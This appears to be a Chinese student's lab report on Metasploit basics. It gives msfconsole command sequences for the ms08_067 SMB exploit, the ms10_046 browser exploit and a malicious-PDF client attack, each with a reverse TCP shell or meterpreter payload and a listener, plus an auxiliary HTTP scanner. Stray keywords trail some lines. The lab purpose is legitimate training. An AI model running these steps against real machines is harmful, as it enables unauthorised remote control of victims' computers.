本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell
一個主動攻擊實踐,如ms08_067;windows
一個針對瀏覽器的攻擊,如ms11_050;api
一個針對客戶端的攻擊,如Adobe;瀏覽器
成功應用任何一個輔助模塊。session
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。框架
程序存在漏洞,敵手透過漏洞發送惡意代碼控制被害主機。
惡意連接,其本意是攻擊ie,可是一旦不當心打開了這樣的連接就會被攻擊。
惡意程序假裝成常見的應用程序,以pdf爲例,惡意程序攻擊的是pdf,可是若是打開了這樣的應用,就會中招。tcp
主要集成模塊,即metasploit框架中所使用的軟件代碼組件。主要包括:
exploit
payload 有效載荷,即攻擊所依附的主體
encode 改變shellcode形態,去掉壞字符
nop 空字符,做着陸區。
輔助模塊,即攻擊前提供目標準確信息以便發動更加精準的攻擊。學習
auxiliary編碼
/usr/share/metasploit-framework/modules : 模塊目錄。
search + 指令:查找相關的指令位置。
use + 模塊名:使用模塊。
info + 模塊名:查看模塊使用說明。
armitage : 使用圖形化界面。
msfconsole -r +指令 :自動化執行。3d
攻擊方:Kali Linux x64
靶機:Windows XP SP3(English)
關閉XP的全部防護,包括防火牆和殺毒軟件。
在Kali機啓動msfconsole,按照指導步驟輸入如下代碼:
use exploit/windows/smb/ms08_067_netapi // 使用ms08_067漏洞攻擊方式 set payload generic/shell_reverse_tcp // 以shell反向tcp鏈接爲有效載荷 set RHOST 192.168.129.134 // 受害者的IP set LHOST 192.168.129.133 // 施害者的IP set target 0 // 設置目標,0爲無差異攻擊
輸入exploit
開始發動攻擊:
search ms10_046
找到能夠攻擊的模塊use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show payloads
選擇攻擊載荷,咱們選擇generic/shell_reverse_tcp
,輸入命令set payload generic/shell_reverse_tcp
使用show options
查看配置設置並進行修改exploit
執行輸入exploit
會出現一段URI:http://192.168.129.133:80/,同時控制檯進入監聽狀態。
受害者訪問這個神奇的URI,會彈出一個這樣的窗口:
控制檯同受害者創建起一個鏈接:
對配置進行修改,選用set payload windows/meterpreter/reverse_tcp
,設置後查看結果,輸入sessions
查看到一個ID號爲1的會話:
輸入sessions
查看有多少機器被反向連接到Kali機上(只有一個)。
再次輸入sessions -i
1以控制受害者。
search adobe
查詢和adobe漏洞有關的模塊,輸入命令exploit/windows/fileformat/adobe_pdf_embedded_exe
windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
使用攻擊載荷exploit
執行查看結果同時,在Kali的msfconsole上輸入如下命令開始監聽:
use exploit/multi/handler set LHOST 192.168.129.133 set LPORT 4444 exploit
獲得結果:
show auxiliary
查看輔助模塊,並挑選使用scanner/http/options
use scanner/http/options
,輸入info
查看信息exploit
執行此次實踐多了本身思考的過程,感受對msf的瞭解更多了一點,也更加能經過這種借鑑別人而後本身嘗試的方式學習到更多